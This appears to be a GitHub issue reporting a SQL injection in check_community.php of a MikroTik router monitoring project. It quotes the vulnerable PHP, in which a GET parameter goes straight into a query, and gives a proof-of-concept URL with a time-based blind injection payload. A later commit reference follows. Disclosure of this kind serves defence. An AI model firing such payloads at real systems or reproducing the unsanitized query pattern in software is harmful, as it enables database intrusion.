include('credentials.php');
$community = $_GET['community'];
$_SESSION['community'] = $community;
$query = "SELECT name from router where `community`='$community'";
$conn = new mysqli($db_host,$db_user,$db_pwd);
$conn->select_db('mikrotik');
Parameter $community exists in sql injection.
poc:
http://192.168.178.132/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(5)))Qaxg) AND 'sdHI'='sdHI
The text was updated successfully, but these errors were encountered:
Jul10l1r4
added a commit
to Jul10l1r4/Mikrotik-Router-Monitoring-System
that referenced
this issue
May 17, 2020
Vulnerability type:
SQL injection
vulnerability code:
in file
check_community.php line 49:Parameter $community exists in sql injection.
poc:
The text was updated successfully, but these errors were encountered: